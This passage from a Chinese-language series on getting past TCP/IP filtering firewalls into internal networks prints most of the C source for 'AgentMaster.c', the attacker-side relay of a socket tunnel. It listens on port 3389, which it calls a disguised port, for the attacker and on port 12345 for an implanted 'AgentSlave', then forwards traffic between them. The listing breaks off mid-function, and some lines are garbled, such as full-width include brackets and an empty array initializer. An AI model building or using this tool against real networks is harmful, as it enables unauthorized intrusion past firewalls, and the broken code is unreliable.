|
如何突破TCP-IP过滤防火墙进入内网(6) Module Name:AgentMaster.c
Date:2001/4/16
CopyRight(c) eyas
说明:scoket代理主控端,负责监听两个TCP socket,等待攻击者和AgentSlave来连接,两个
scoket都连接成功后,开始转发数据
sock[0]是client==〉sock[0] sock[1]是target==〉sock[1]
***************************************************************/
#include 〈stdio.h〉
#include 〈winsock2.h〉
#include "TCPDataRedird.c"
#pragma comment(lib,"ws2_32.lib")
#define TargetPort 3389//伪装的target的监听端口
#define LocalPort 12345//等待AgentSlave来connect的端口
int main()
{
WSADATA wsd;
SOCKET s3389=INVALID_SOCKET,//本机监听的socket,等待攻击者连接
s1981=INVALID_SOCKET,//监听的socket,等待AgentSlave来连接
sock[2]=;
struct sockaddr_in Local3389,Local1981,Attack,Slave;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
//load winsock library
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
}
//create socket
s3389=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(s3389==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//create socket
s1981=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(s1981==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//fill the struct
Local3389.sin_addr.s_addr=htonl(INADDR_ANY);
Local3389.sin_family=AF_INET;
Local3389.sin_port=htons(TargetPort);
Local1981.sin_addr.s_addr=htonl(INADDR_ANY);
Local1981.sin_family=AF_INET;
Local1981.sin_port=htons(LocalPort);
//bind s3389 for attacker
if(bind(s3389,(struct sockaddr
*)&Local3389,sizeof(Local3389))==SOCKET_ERROR)
{
printf("\nbind() failed:%d",GetLastError());
__leave;
}
//listen for attacker to connect
if(listen(s3389,1)==SOCKET_ERROR)
{
printf("\nlisten() failed:%d",GetLastError());
__leave;
}
//bind s1981 for AgentSlave
|
